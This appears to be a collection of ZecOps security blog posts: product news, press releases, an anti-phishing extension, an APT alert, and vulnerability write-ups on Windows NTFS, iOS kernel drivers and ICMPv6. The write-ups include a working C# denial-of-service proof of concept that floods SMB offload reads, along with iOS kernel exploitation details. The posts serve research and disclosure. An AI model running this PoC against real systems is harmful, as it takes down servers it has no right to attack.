As cyberattacks targeting mobile devices are on the rise, we continue to see massive adoption from both the private and public sectors. We are really excited to share two new features which will dramatically improve the ZecOps experience!
New “Always-on” Application for macOS
ZecOps is making it even easier for users to perform complex investigations of their mobile devices. Now, users can inspect their mobile devices automatically each time the phone is connected to their laptop. ZecOps for Mobile supports both iOS and Android.
Send an inspection link to a customer or colleague
ZecOps administrators now have the ability to generate a unique link to download the ZecOps Collector App from the ZecOps Dashboard. The link can then be shared with the person/group whose device you wish to inspect via email, text, or Slack.
The Collector App can be downloaded on any laptop. This feature is ideal for incident responders, managed service providers, and SOC operators.
Phishing is a common social engineering attack that scammers use to steal personal information, including authentication credentials and credit card numbers. Despite being well known for more than 30 years, phishing is still the most common attack performed by cyber-criminals. There have been several attempts at combating phishing attacks, but none has successfully eliminated the problem.
One of the most common attack scenarios involves the attacker sending an email or a text message to the victim. The message, pretending to be from a trustworthy entity, links to a fake website which visually matches a legitimate site. Nowadays, most browsers include limited protection against phishing, relying on a list of known phishing domains. While such protection has value, it’s still easy to bypass.
To help combat phishing attacks, we developed a browser extension that takes a different approach. Instead of trying to determine whether a visited website is a fake website used for phishing, we augment the website with additional visual information, allowing the user to make an informed decision. The user can take into account context that the browser has no way of knowing, such as the origin of the link and the sensitivity of the information about to be entered.
The website identity
One of the most common types of phishing is tricking the user into entering credentials into a fake website. The traditional way of avoiding such phishing is to check the address bar and verify that the address matches the expected, legitimate website. Such a check requires some discipline, and is easy to miss amid a busy day.
The main goal of ZecOps Anti-Phishing Extension is to make it easy to determine the identity of a website, having a visual indication that is difficult to miss.
Take a look at the following example:
In this example, the victim navigated to a fake website pretending to be paypal.com. Without the extension (left part of the image), the only difference compared to the real website is a single character in the address bar (1 instead of l in “paypal”). With the extension, the victim gets critical information just before entering his credentials:
The website is visited for the first time. For a website such as PayPal, which the victim probably visited multiple times before, this is a red flag.
The domain name is very similar to another, well known domain name. In this case, the extension is able to recognize that “paypa1.com” is visually similar to “paypal.com”, making the phishing attempt obvious.
The elephant image is the visual identity of the website that the extension generated for paypa1.com, which is most likely to be different from the visual identity of paypal.com. If the victim signs into paypal.com often, he might notice that the image changed and that something is wrong. Users won’t be able to remember all images for all websites, but that’s another measure of caution that can prevent a successful attack, and is more effective for websites that are visited more often.
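The second signal in the list above, visual similarity between domain names, can be approximated with a small table of confusable characters. The following is a minimal sketch under stated assumptions, not the extension's actual algorithm: the `CONFUSABLES` table, the `KNOWN_DOMAINS` list, and both function names are hypothetical and exist only for illustration.

```python
# Hypothetical sketch of a lookalike-domain check. The extension's real
# logic is not described in this post.

# Assumed table of characters that are easy to confuse at a glance.
CONFUSABLES = str.maketrans({"1": "l", "0": "o", "5": "s"})

# Assumed list of well-known domains to compare against.
KNOWN_DOMAINS = ["paypal.com", "google.com", "microsoft.com"]


def skeleton(domain):
    """Map confusable characters to a single canonical form."""
    return domain.lower().translate(CONFUSABLES)


def lookalike_of(domain, known=KNOWN_DOMAINS):
    """Return the known domain that `domain` imitates, or None."""
    domain = domain.lower()
    for candidate in known:
        # A domain is a lookalike if it differs from the known domain
        # but collapses to the same skeleton.
        if domain != candidate and skeleton(domain) == skeleton(candidate):
            return candidate
    return None


print(lookalike_of("paypa1.com"))   # the fake domain from the example
print(lookalike_of("paypal.com"))   # the real domain is not flagged
```

A real implementation would need a much larger confusables table (including Unicode homoglyphs) and a way to maintain the list of well-known domains.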
Misleading links
Another common phishing technique involves sending a message with a link that looks legit, but leads to a different website that is controlled by the attacker. ZecOps Anti-Phishing Extension detects such links and displays a warning message:
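One way to detect such links is to compare the address shown in the link text with the host the link actually points to. The sketch below is an assumption about how such a check could work, not the extension's implementation; `is_misleading` and its helpers are hypothetical names.

```python
import re
from urllib.parse import urlsplit

# Matches link text that itself looks like a web address, e.g.
# "paypal.com" or "https://www.paypal.com/signin".
_ADDRESS_RE = re.compile(
    r"^(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.IGNORECASE
)


def _normalize(host):
    """Lowercase the host and drop a leading 'www.' label."""
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def is_misleading(link_text, href):
    """True if the text shows one host but the link leads to another."""
    match = _ADDRESS_RE.match(link_text.strip())
    if not match:
        return False  # the text does not claim to be an address
    shown = _normalize(match.group(1))
    actual = _normalize(urlsplit(href).hostname or "")
    return shown != actual


print(is_misleading("https://www.paypal.com/signin", "https://evil.example/login"))
print(is_misleading("paypal.com", "https://www.paypal.com/"))
```

Links whose text is ordinary prose ("Click here") are not flagged by this check, since the text makes no claim about the destination.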
A word about privacy
We care about our users’ privacy, and so the extension doesn’t send any information back to us. We don’t collect the websites you visit, the messages you see, or anything at all. The only data we collect is through our phishing reporting form that you can voluntarily submit.
Installing the extension
You can get the extension in the extension store for your browser:
We created this project as a community project. If you’d like to learn about the other initiatives we have at ZecOps, we invite you to learn more about ZecOps Mobile EDR / DFIR solutions here.
Ehud Schneourson to provide cyberdefense expertise and tactical guidance to burgeoning mobile security startup, with additional appointments to be announced in the coming months
SAN FRANCISCO, April 1st, 2021 — ZecOps, the world’s most powerful platform to discover and analyze mobile cyber attacks, announced the formation of its international Defense Advisory Board. Ehud Schneourson, (ret.) Brigadier General and commander of Israel’s elite Unit 8200, was appointed as Chairman.
“It takes a submarine to discover other submarines, and ZecOps is the submarine we were all waiting for in the mobile security space.” said Ehud Schneourson. “Attackers used to care only about Google and Apple, but ZecOps created an entire category of problems for attackers. I’m thrilled to partner with ZecOps in their mission to protect our most sensitive assets, our mobile devices.”
“ZecOps is a true mobile EDR that is technically non-existent in the market today”, Schneourson summarized.
ZecOps’ success in the public and private sectors has been bolstered by the discovery of several advanced attacks. These include a “0-click” vulnerability on the default iOS Mail app, attacks on journalists in the Middle East, and others.
ZecOps estimates that there are hundreds of sophisticated organizations targeting mobile devices, many of whom sell their exploits on the black market. This claim is supported by ZecOps Mobile Threat Intelligence, which has shown a rapid increase in the number of mobile cyberattacks in the past year.
“The number of attacks that we have discovered on mobile devices is mind blowing. I can’t wait to see what else we’ll discover in the years to come,” said Zuk Avraham, co-founder and CEO of ZecOps. “Mobile devices have become our ‘single factor of authentication’, and the most desirable target for attackers. Our Defense Advisory Board understands and appreciates the creativity needed to establish proper mobile cyberdefense. I’m thrilled to bring Ehud onboard, and am excited to partner with him and the world’s defense leaders”.
About ZecOps:
ZecOps develops the world’s most powerful platform to discover and analyze mobile cyber attacks. Used by world-leading governments, enterprises, and individuals globally, ZecOps Mobile EDR provides a realistic and scalable approach to mobile threat hunting. ZecOps enables automated discovery of 0-day attacks and Advanced Persistent Threats (APTs), delivering anti cyber-espionage capabilities within minutes. Headquartered in San Francisco, ZecOps was co-founded by Zuk Avraham, a security researcher and serial entrepreneur who previously founded Zimperium.
The mobile security startup is among the top-ranked companies in the Security category
ZecOps, the automated platform for discovering mobile cyber threats, has been named to Fast Company’s prestigious annual list of the World’s Most Innovative Companies for 2021. The Fast Company list honors businesses that have demonstrated the unique ability to service customers in rapidly evolving industries, like cybersecurity, with new and novel approaches.
“This is a major milestone for ZecOps, and confirms what our customers already know – that ZecOps mobile threat discovery is the most efficient way to evaluate the integrity of smartphones,” said Zuk Avraham, Co-Founder & CEO of ZecOps. “We’re grateful to Fast Company for acknowledging our innovative approach to discovering sophisticated attacks on mobile devices.”
ZecOps has seen tremendous customer growth in 2020, a time during which the company discovered several highly publicized vulnerabilities. These include a “0-click” vulnerability on the default iOS Mail app, attacks on journalists in the Middle East, and others. ZecOps is used by world-leaders, governments, leading enterprises, and targeted individuals concerned with discovering cyberattacks on mobile devices and performing threat hunting.
“In a year of unprecedented challenges, the companies on this list exhibit fearlessness, ingenuity, and creativity in the face of crisis,” said Fast Company Deputy Editor David Lidsky, who oversaw the issue with Senior Editor Amy Farley.
ABOUT ZECOPS
ZecOps is the world’s most powerful platform to discover and analyze mobile cyber attacks. Used by governments, enterprises, and individuals worldwide, ZecOps provides a realistic and scalable approach to mobile threat hunting. ZecOps enables automated discovery of 0-day attacks and Advanced Persistent Threats (APTs), delivering anti- cyber espionage analysis within minutes. Headquartered in San Francisco, ZecOps was co-founded by Zuk Avraham, a security researcher and serial entrepreneur who previously founded Zimperium.
ABOUT FAST COMPANY
Fast Company is the only media brand fully dedicated to the vital intersection of business, innovation, and design, engaging the most influential leaders, companies, and thinkers on the future of business. The editor-in-chief is Stephanie Mehta. Headquartered in New York City, Fast Company is published by Mansueto Ventures LLC, along with our sister publication Inc., and can be found online at www.fastcompany.com.
This post follows the Google TAG announcement that several Twitter profiles were part of an APT campaign targeting security researchers. According to Google TAG, the threat actors are North Korean. They established credibility by publishing well-thought-out blog posts and by interacting with researchers via Direct Messages, and then lured the researchers into downloading and running an infected Visual Studio project.
Some of the fake profiles were: @z0x55g, @james0x40, @br0vvnn, @BrownSec3Labs
Using a Chrome 0day to infect clients?
In their post, Google TAG mentioned that the attackers were able to pop a fully patched Windows box running Chrome.
From Google’s post:
In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog. In each of these cases, the researchers have followed a link on Twitter to a write-up hosted on blog.br0vvnn[.]io, and shortly thereafter, a malicious service was installed on the researcher’s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.
Attacking Mobile Users?
According to ZecOps Mobile Threat Intelligence, the same threat actor might have used an Android 0day too.
If you entered this blog from your Android or iOS devices – we would like to examine your device using ZecOps Mobile DFIR tool to gather additional evidence. Please contact us as soon as convenient at [email protected]
Hear the news first
Only essential content
New vulnerabilities & announcements
News from ZecOps Research Team
Your subscription request to ZecOps Blog has been successfully sent.
This is an analysis of the CVE-2020-17096 vulnerability published by Microsoft on December 12, 2020. The remote code execution vulnerability, assessed with Exploitation: “More Likely”, grabbed our attention among the latest Patch Tuesday fixes.
Diffing ntfs.sys
Comparing the patched driver to the unpatched version with BinDiff, we saw that there’s only one changed function, NtfsOffloadRead.
The function is rather big, and from a careful comparison of the two driver versions, the only changed code is located at the very beginning of the function:
uint NtfsOffloadRead(PIRP_CONTEXT IrpContext, PIRP Irp)
{
    PVOID decoded = NtfsDecodeFileObjectForRead(...);
    if (!decoded) {
        if (NtfsStatusDebugFlags) {
            // ...
        }
        // *** Change 1: First argument changed from NULL to IrpContext
        NtfsExtendedCompleteRequestInternal(NULL, Irp, 0xc000000d, 1, 0);
        // *** Change 2: The following if block was completely removed
        if (IrpContext && *(PIRP *)(IrpContext + 0x68) == Irp) {
            *(PIRP *)(IrpContext + 0x68) = NULL;
        }
        if (NtfsStatusDebugFlags) {
            // ...
        }
        return 0xc000000d;
    }
    // The rest of the function...
}
Triggering the vulnerable code
From the name of the function, we deduced that it’s responsible for handling offload read requests, part of the Offloaded Data Transfers functionality introduced in Windows 8. An offload read can be requested remotely via SMB by issuing the FSCTL_OFFLOAD_READ control code.
Indeed, by issuing the FSCTL_OFFLOAD_READ control code we’ve seen that the NtfsOffloadRead function is being called, but the first if branch is skipped. After some experimentation, we saw that one way to trigger the branch is by opening a folder, not a file, before issuing the offload read.
Exploring exploitation options
We looked at each of the two changes and tried to come up with the simplest way to cause some trouble to a vulnerable computer.
First change: The NtfsExtendedCompleteRequestInternal function wasn’t receiving the IrpContext parameter.
Briefly looking at NtfsExtendedCompleteRequestInternal, it seems that if the first parameter is NULL, it’s being ignored. Otherwise, the numerous fields of the IrpContext structure are being freed using functions such as ExFreePoolWithTag. The code is rather long and we didn’t analyze it thoroughly, but from a quick glance we didn’t find a way to misuse the fact that those functions aren’t being called in the vulnerable version. We observed, though, that the bug causes a memory leak in the non-paged pool, which is guaranteed to reside in physical memory.
We implemented a small tool that issues offload reads in an infinite loop. After a couple of hours, our vulnerable VM ran out of memory and froze, no longer responding to any input. Below you can see the Task Manager screenshots and the code that we used.
Second change: An IRP pointer field, part of IrpContext, was set to NULL.
From our quick attempt, we didn’t find a way to misuse the fact that the IRP pointer field is set to NULL. If you have any ideas, let us know.
What about remote code execution?
We’re curious about that as much as you are. Unfortunately, there’s a limited amount of time that we can invest in satisfying our curiosity. We went as far as finding the vulnerable code and triggering it to cause a memory leak and an eventual denial of service, but we weren’t able to exploit it for remote code execution.
It is possible that there’s no actual remote code execution here, and it was marked as such just in case, as it happened with the “Bad Neighbor” ICMPv6 Vulnerability (CVE-2020-16898). If you have any insights, we’ll be happy to hear about them.
CVE-2020-17096 POC (Denial of Service)
Before. An idle VM with a standard configuration and no running programs.
After. The same idle VM after triggering the memory leak, unresponsive.
using (var trans = new Smb2ClientTransport())
{
    var ipAddress = System.Net.IPAddress.Parse(ip);
    trans.ConnectShare(server, ipAddress, domain, user, pass, share, SecurityPackageType.Negotiate, true);
    trans.Create(
        remote_path,
        FsDirectoryDesiredAccess.GENERIC_READ | FsDirectoryDesiredAccess.GENERIC_WRITE,
        FsImpersonationLevel.Anonymous,
        FsFileAttribute.FILE_ATTRIBUTE_DIRECTORY,
        FsCreateDisposition.FILE_CREATE,
        FsCreateOption.FILE_DIRECTORY_FILE);
    FSCTL_OFFLOAD_READ_INPUT offloadReadInput = new FSCTL_OFFLOAD_READ_INPUT();
    offloadReadInput.Size = 32;
    offloadReadInput.FileOffset = 0;
    offloadReadInput.CopyLength = 0;
    byte[] requestInputOffloadRead = TypeMarshal.ToBytes(offloadReadInput);
    while (true)
    {
        trans.SendIoctlPayload(CtlCode_Values.FSCTL_OFFLOAD_READ, requestInputOffloadRead);
        trans.ExpectIoctlPayload(out _, out _);
    }
}
C# code that causes the memory leak and the eventual denial of service. It was used with the Windows Protocol Test Suites.
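The `Size = 32` in the code above corresponds to the length of the FSCTL_OFFLOAD_READ_INPUT structure. As a hedged illustration in Python (not part of our original tool), and assuming the field layout documented in MS-FSCC (Size, Flags, TokenTimeToLive, Reserved, FileOffset, CopyLength), the same request buffer could be built by hand. The function name `build_offload_read_input` is hypothetical.

```python
import struct

# Assumed layout, per MS-FSCC: four 32-bit fields followed by two 64-bit
# fields, all little-endian, with no padding.
#   Size, Flags, TokenTimeToLive, Reserved, FileOffset, CopyLength
OFFLOAD_READ_INPUT = struct.Struct("<IIIIQQ")


def build_offload_read_input(file_offset=0, copy_length=0, token_ttl=0):
    """Serialize an FSCTL_OFFLOAD_READ_INPUT request buffer."""
    return OFFLOAD_READ_INPUT.pack(
        OFFLOAD_READ_INPUT.size,  # Size: length of this structure
        0,                        # Flags
        token_ttl,                # TokenTimeToLive
        0,                        # Reserved
        file_offset,              # FileOffset
        copy_length,              # CopyLength
    )


payload = build_offload_read_input()
print(len(payload), payload.hex())
```

With `FileOffset` and `CopyLength` both zero, as in the C# code, only the leading Size field is non-zero.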
ZecOps is proud to share that we detected multiple exploits by the threat actors that recently targeted Aljazeera’s journalists before the campaign was made public. The attacks were detected automatically using ZecOps Mobile DFIR.
In this blog post, we’ll share our analysis of the post-exploitation kernel panics observed on one of the targeted devices.
Key details on the attacks targeting journalists in Middle East:
First known attack: earliest signs of compromise on January 17th, 2020.
Was the attack successful: Yes – the device shows signs of a successfully planted malware / rootkit.
Persistence: The device shows signs of persistent malware that is capable of surviving reboots. It is unclear whether the device was re-infected following an OS update, or whether the malware also persisted between OS updates.
Attack Impact: The threat operators were able to continuously access the device’s microphone, camera, and data, including texts and emails, for the entire period.
Attribution: We named this threat actor Desert Cobra. We do not rule out that NSO (aka “NSO Group”) was involved in the other reporters’ cases that were published today by Citizen Lab. We refrain from naming NSO as the threat actor that targeted one of the victims in the Citizen Lab report, because some of the activities do not add up with our Mobile Threat Intelligence on NSO. We also do not rule out that this device was potentially compromised by more than one threat actor simultaneously.
OS Update? We do recommend updating to the latest iOS version; however, we have no evidence that this actually fixes any of the vulnerabilities that were exploited by the threat operator(s).
Post-exploitation Panic Analysis
A tale of two panics: MobileMail and mediaanalysisd: kauth_cred_t corruption
The following stack backtrace of the MobileMail panic indicates that the panic happened on function kauth_cred_unref:
kauth_cred_unref frees credential structures from the kernel. The following is the stack backtrace of the mediaanalysisd panic, which also happened in the function “kauth_cred_unref”:
Both of the panics happened inside “AUDIT_SESSION_UNREF”, which means the credential structure of the processes was corrupted.
A classic way to gain root access for a kernel exploit is to replace the credential structure of an attacker-controlled process with the kernel credentials. Please note that this doesn’t necessarily mean that MobileMail or mediaanalysisd was controlled. The corruption of the credential structures could also have happened due to wrong offsets during exploitation.
ZecOps customers: no further action is required. The deployed systems detect these activities. The complete report and full IOC list is available in ZecOps Threat Intelligence feed.
This is a story about a Microsoft Teams crash that we investigated recently. At first glance, it looked like a possible arbitrary code execution vulnerability, but after diving deeper we realized that there’s another explanation for the crash.
TL;DR
ZecOps ingested and analyzed a seemingly exploitable Microsoft Teams event from a Windows machine
This machine has a lot of other anomalies
ZecOps verifies anomalies such as: blue screens, sudden crashes, mobile restarts without clicking on the power button; and determines if they are related to cyber attacks, software/hardware issues, or configuration problems.
Spoiler alert (text beneath the black highlight):
After further analyzing the crash, we realized that faulty hardware was causing this seemingly exploitable event, and that it was not related to an intentional attack. We suspect that a bit flip was caused by a bad hardware component.
Business impact: Hardware problems are more common than we think. Recurring hardware faults lead to continuous loss of productivity, context switches, and IT/cyber disruptions. Identifying faulty hardware can save a lot of time. We recommend using the freely available, agentless tool ZOTOMATE to tell software problems apart from hardware problems. ZecOps leverages machine learning and its mobile threat intelligence, mobile DFIR, endpoint and server crash analysis, and mobile app crash analysis to perform such analysis at scale.
The crash
Looking at the call stack, we saw that the process crashed due to a stack overflow:
It can be seen from the call stack that the original exception occurred earlier, at address 00007ff7`8b93338a. Due to incorrect exception handling, the RtlDispatchException function raised the STATUS_INVALID_DISPOSITION exception again and again in a loop, until no space was left in the stack and the process crashed. That’s an actual bug in Teams that Microsoft might want to fix, but it manifests itself only when the process is about to crash anyway, so that might not be a top priority.
The original exception
To extract the original exception that occurred on address 00007ff7`8b93338a, we did what Raymond Chen suggested in his blog post, Sucking the exception pointers out of a stack trace. Using the .cxr command with the context record structure passed to the KiUserExceptionDispatcher function, we got the following output:
The original exception was triggered by accessing an invalid pointer of the value 00010000`00000000. Not only does the pointer look invalid, it’s actually a non-canonical address in today’s hardware implementations of x86-64, which means that it can never be allocated or become valid. Next, we looked at the assembly instructions below the crash:
Very interesting! If we can control the rdi register at this point of the execution, that’s a great start for arbitrary code execution. All we need to control the instruction pointer is to be able to build a fake virtual table, or to use an existing one, and the lack of support for Control Flow Guard (CFG) makes things even easier. As a side note, there’s an issue about adding CFG support which is being actively worked on.
At this point, we wanted to find answers to the following questions:
How can this bug be reproduced?
What source of input can trigger the bug? Specifically, can it be triggered remotely?
To what extent can the pointer be controlled?
The original exception stack trace
In order to try and reproduce the crash, we needed to gather more information about what was going on when the exception occurred. We checked the original exception stack trace and got the following:
It can be deduced from the large offsets that something is wrong with the symbols, as Raymond Chen also explains in his blog post, Signs that the symbols in your stack trace are wrong. In fact, Teams comes with no symbols, and there’s no public symbol server for it, so the symbols we see in the stack trace are some of the few functions exported by name. Fortunately, Teams is based on Electron which is open source, so we were able to match the Teams functions on the stack to the same functions in Electron. At first, we tried to do that with a binary diffing tool, but it didn’t work so well due to the executable/symbol files being so large (exe – 120 MB, pdb – 2 GB), so we ended up matching the functions manually.
WTF was indeed our reaction when we saw where the exception occurred (which, of course, means Web Template Framework).
From what we can see, the hasOwnProperty object method was called, at which point the garbage collection was triggered, and the invalid pointer was accessed while processing one of its internal hash tables. Could it be that we found a memory bug in the V8 garbage collection? We believed it to be quite unlikely. And if so, how do we reproduce it?
Switching context
At this point we put the Teams crash on hold and went on to look at the other crashes which occurred on the same computer. Once we did that, it all became clear: the computer had several BSODs, all of the type MEMORY_CORRUPTION_ONE_BIT, indicating faulty memory/storage hardware. And it looks like that’s exactly what happened in the Teams crash: the faulty address was originally a NULL pointer, but because of a corrupted bit it became 00010000`00000000, causing the exception and the crash.
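Both observations about the faulty pointer are easy to check by hand. The sketch below is only an illustration of the reasoning, assuming 48-bit virtual addresses (the common x86-64 configuration); the helper names are ours and are not taken from any debugger or tool.

```python
def is_canonical(addr, va_bits=48):
    """True if bits 63..(va_bits-1) of a 64-bit address are all equal."""
    top = addr >> (va_bits - 1)                 # upper bits, incl. sign bit
    all_ones = (1 << (64 - va_bits + 1)) - 1
    return top == 0 or top == all_ones


def flipped_bits(expected, observed):
    """Return the bit positions at which two 64-bit values differ."""
    diff = expected ^ observed
    return [bit for bit in range(64) if (diff >> bit) & 1]


FAULTY_POINTER = 0x0001000000000000   # value seen in the Teams crash

print(is_canonical(FAULTY_POINTER))          # non-canonical address
print(is_canonical(0x00007FF78B93338A))      # address of the faulting code
print(flipped_bits(0x0, FAULTY_POINTER))     # bits differing from NULL
```

The faulty pointer differs from NULL in exactly one bit (bit 48), which is consistent with the MEMORY_CORRUPTION_ONE_BIT crashes seen on the same machine.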
Conclusion
The conclusion is that the relevant computer needs to have its faulty hardware replaced, and of course there’s nothing wrong with V8’s garbage collection that has anything to do with the crash. That’s yet another reminder that hardware problems can cause various anomalies that are hard to explain, such as this Teams crash or crashing at the xor eax, eax instruction.
Abstract. Due to its popularity, iOS has attracted the attention of a large number of security researchers. Apple is constantly improving iOS security, developing and adopting new mitigations at a rapid pace. These mitigations increase the complexity of hacking iOS devices, making iOS one of the hardest platforms to hack. However, they are not yet sufficient to block skilled individuals and well-funded groups from achieving remote code execution with elevated permissions and persistence on the device.
This blog post is the first in a series on achieving elevated privileges on iOS.
This series of posts will cover the whole path: obtaining privileged access, the userspace exploit, and persistence on the device following a reboot. The full reports are currently available to iOS Threat Intelligence subscribers of ZecOps Mobile Threat Intelligence.
We will cover in detail how chaining a few bugs leads us to run code in the context of the iOS kernel. Chaining such bugs with other exploits (e.g. the iOS MailDemon vulnerability, or other WebKit-based bugs) allows an attacker to gain full remote control over iOS devices.
This exploit was obtained as part of ZecOps Reverse Bounty, and donated to FreeTheSandbox initiative.
Freethesandbox.org – Free The Sandbox restrictions from iOS & Android devices
We would like to thank @08Tc3wBB for participating in ZecOps Reverse Bounty, and everyone else that helped in this project. We would also like to thank the Apple Security team for fixing these bugs and preventing further abuse of these bugs in up to date versions of iOS.
As we’re planning to release the additional blogs, we are already releasing a full Local Privilege Escalation chain that works on iOS 13.7 and earlier versions on both PAC and non-PAC devices.
We are making this release fully open-source for transparency. We believe that it is the best outcome to improve iOS research and platform security.
AppleAVE2 is a graphics IOKit driver that runs in kernel space and exists only on iOS. Just like many other iOS-exclusive drivers, it’s not open source and most of its symbols have been removed.
The driver can’t be accessed from the default app sandbox environment, which reduces the chances of thorough analysis by Apple engineers or other researchers. The old implementation of this driver seems like a good attack surface, and the following events demonstrate this well.
From the description of these vulnerabilities, some remain attractive even today. While powerful mitigations like PAC (for iPhones/iPads with A12 and above) and zone_require (iOS 13 and above) are present, arbitrary memory manipulation vulnerabilities such as CVE-2017-6997 and CVE-2017-6999 play a far greater role than the execution hijacking type, and have great potential when chained with various information leakage vulnerabilities.
Despite the fact that these vulnerabilities have CVEs, which generally indicates that they have been fixed, Apple has previously failed to fix bugs in one go and has even reintroduced bugs that were already fixed. With that in mind, let’s commence our journey to hunt the next AVE vulnerability!
We will start off from the user-kernel data interaction interface:
AppleAVE2 exposes 9 methods (index 0-8) by overriding IOUserClient::externalMethod:
Two exposed methods (index 0 and 1) allow adding or removing clientbuf(s), in FIFO order.
The rest of the methods (index 3-8) all eventually call AppleAVE2Driver::SetSessionSettings through IOCommandGate to ensure thread safety and avoid races.
*1 The Overlapping Segment Attack against dyld, used to achieve an untethered jailbreak, first appeared in the iOS 6 jailbreak tool evasi0n. A similar approach was then shown in every public jailbreak until, after Pangu9, Apple seems to have finally eradicated the issue.
*2 Apple accidentally reintroduced a previously fixed security flaw in a newer version.
We mainly use the method at index 7 to encode a clientbuf, which basically means loading many IOSurfaces via IDs provided from userland, and use the method at index 6 to trigger the multiple security flaws located inside AppleAVE2Driver::SetSessionSettings.
The following chart shows the relationships between the salient objects:
clientbuf is a memory buffer allocated via IOMalloc, with a quite significant size (0x29B98 in iOS 13.2).
Every clientbuf object that is added contains pointers to the previous and next clientbuf, forming a doubly linked list, so the AppleAVE2Driver instance stores only the pointer to the first clientbuf.
The clientbuf contains multiple MEMORY_INFO structures. When user-space provides IOSurface, an iosurfaceinfo_buf will be allocated and then used to fill these structures.
iosurfaceinfo_buf contains a pointer to AppleAVE, as well as variables related to mapping from user-space to kernel-space.
As part of the clientbuf structure, the content of these InitInfo_block(s) is copied from user-controlled memory through IOSurface. This happens the first time the user calls another exposed method (at index 7) after adding a new clientbuf.
m_DPB is related to an arbitrary memory read primitive which will be explained later in this post.
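To make the list structure concrete, here is a toy model in Python of how a driver that stores only the first clientbuf pointer could add and remove clientbufs in FIFO order. This is purely illustrative: the class names, fields, and methods are hypothetical and do not reflect the real (closed-source) AppleAVE2 layout, and we assume that "FIFO order" means the oldest clientbuf is removed first.

```python
class ClientBuf:
    """Toy stand-in for a clientbuf: only the list links are modeled."""

    def __init__(self, ident):
        self.ident = ident
        self.prev = None   # pointer to the previous clientbuf
        self.next = None   # pointer to the next clientbuf


class Driver:
    """Toy stand-in for the driver instance: stores only the list head."""

    def __init__(self):
        self.first = None

    def add(self, buf):
        """Append a clientbuf at the tail of the doubly linked list."""
        if self.first is None:
            self.first = buf
            return
        tail = self.first
        while tail.next is not None:   # walk from the head to the tail
            tail = tail.next
        tail.next = buf
        buf.prev = tail

    def remove_oldest(self):
        """Unlink and return the oldest clientbuf (assumed FIFO order)."""
        buf = self.first
        if buf is None:
            return None
        self.first = buf.next
        if self.first is not None:
            self.first.prev = None
        buf.next = None
        return buf


driver = Driver()
for name in ("a", "b", "c"):
    driver.add(ClientBuf(name))
print(driver.remove_oldest().ident, driver.first.ident)
```

Because every other object is reachable only through these links, a corrupted link or a stale pointer in one clientbuf affects everything the driver later reaches through the list.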
Brief Introduction to IOSurface
If you are not familiar with IOSurface, read the following:
According to Apple’s description, IOSurface is used for sharing hardware-accelerated buffer data (for framebuffers and textures) more efficiently across multiple processes.
Unlike AppleAVE, an IOSurface object can be easily created by any userland process (using IOSurfaceRootUserClient). When you create an IOSurface object, you get a 32-bit Surface ID that is used for indexing in the kernel, so that the kernel can map the userspace memory associated with the object into kernel space.
Now with these concepts in mind let’s talk about the AppleAVE vulnerabilities.
The First Vulnerability (iOS 12.0 – iOS 13.1.3)
The first AppleAVE vulnerability was assigned CVE-2019-8795. Together with two other vulnerabilities, a kernel info leak (CVE-2019-8794) that simply defeats KASLR and a sandbox escape (CVE-2019-8797) that is necessary to access AppleAVE, it formed an exploit chain on iOS 12 that was able to jailbreak the device. That was until the final release of iOS 13, which broke the sandbox escape by applying sandbox rules to the vulnerable process and preventing it from accessing AppleAVE. The sandbox escape was therefore replaced with another sandbox escape vulnerability that was discussed before.
The first AppleAVE vulnerability was eventually fixed with the iOS 13.2 update.
Here is a quick description of it. For a more detailed write-up, you can look at a previous writeup.
When a user releases a clientbuf, it will go through every MEMORY_INFO that the clientbuf contains and will attempt to unmap and release related memory resources.
The security flaw is quite obvious if you compare it with how Apple fixed it:
The unfixed version contains an out-of-bounds access that allows an attacker to hijack kernel code execution on both regular and PAC-enabled devices. This flaw can also be turned into an arbitrary memory release primitive via operator delete. Back then, before Apple fixed the zone_require flaw in iOS 13.6, that was enough to achieve a jailbreak on the latest iOS devices.
The POC released today is just an initial version that will allow others to take it further. The POC shares basic analytics data with ZecOps to find additional vulnerabilities and help further secure iOS – this option can be disabled in the source.
In the next posts we’ll cover:
Additional vulnerabilities in the kernel
Exploiting these vulnerabilities
User-space vulnerabilities
The ultimate persistence mechanism that is likely to never be patched
On Patch Tuesday, October 13, Microsoft published a patch and an advisory for CVE-2020-16898, dubbed “Bad Neighbor”, which was undoubtedly the highlight of the monthly series of patches. The bug has received a lot of attention since it was published as an RCE vulnerability, meaning that with successful exploitation it could be made wormable. Initially, it was graded with a high CVSS score of 9.8/10, though it was later lowered to 8.8.
In the days following the publication, several write-ups and POCs were published. We looked at some of them:
PoC BSOD for CVE-2020-16898 by 0xeb-bp – Another buffer overflow Proof-of-Concept, which we found to be easier to understand and work with than the other two.
The writeup by pi3 contains details that are not mentioned in the writeup by Quarkslab. It’s important to note that the bug can only be exploited when the source address is a link-local address. That’s a significant limitation, meaning that the bug cannot be exploited over the internet. In any case, both writeups explain the bug in general and then dive into triggering a buffer overflow, causing a system crash, without exploring other options.
We wanted to find out whether something else could be done with this vulnerability, aside from triggering the buffer overflow and causing a blue screen (BSOD).
In this writeup, we’ll share our findings.
The bug in a nutshell
The bug happens in the tcpip!Ipv6pHandleRouterAdvertisement function, which is responsible for handling incoming ICMPv6 packets of the type Router Advertisement (part of the Neighbor Discovery Protocol).
As can be seen from the packet structure, the packet consists of a 16-byte header, followed by a variable number of option structures. Each option structure begins with a type field and a length field, followed by specific fields for the relevant option type.
The bug happens due to an incorrect handling of the Recursive DNS Server Option (type 25, RFC 5006):
The Length field defines the length of the option in units of 8 bytes. The option header size is 8 bytes, and each IPv6 address adds an additional 16 bytes to the length. That means that if the structure contains n IPv6 addresses, the length is supposed to be set to 1+2*n. The bug happens when the length is an even number, causing the code to incorrectly interpret the beginning of the next option structure.
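To make the length arithmetic concrete, here is a minimal sketch in C. The helper names rdnss_length_for and rdnss_length_is_well_formed are ours, invented for illustration; they are not part of tcpip.sys. The requirement of at least one address is an assumption taken from the option's specification, not from the driver.

```c
#include <stdbool.h>
#include <stdint.h>

/* Length field (in units of 8 bytes) for an option carrying n IPv6 addresses:
 * one unit for the 8-byte header plus two units per 16-byte address.
 * n is assumed to be small enough (at most 127) to fit the one-byte field. */
static uint8_t rdnss_length_for(unsigned n_addresses)
{
    return (uint8_t)(1 + 2 * n_addresses);
}

/* True if the Length field has the form 1 + 2*n with n >= 1 (assumed minimum). */
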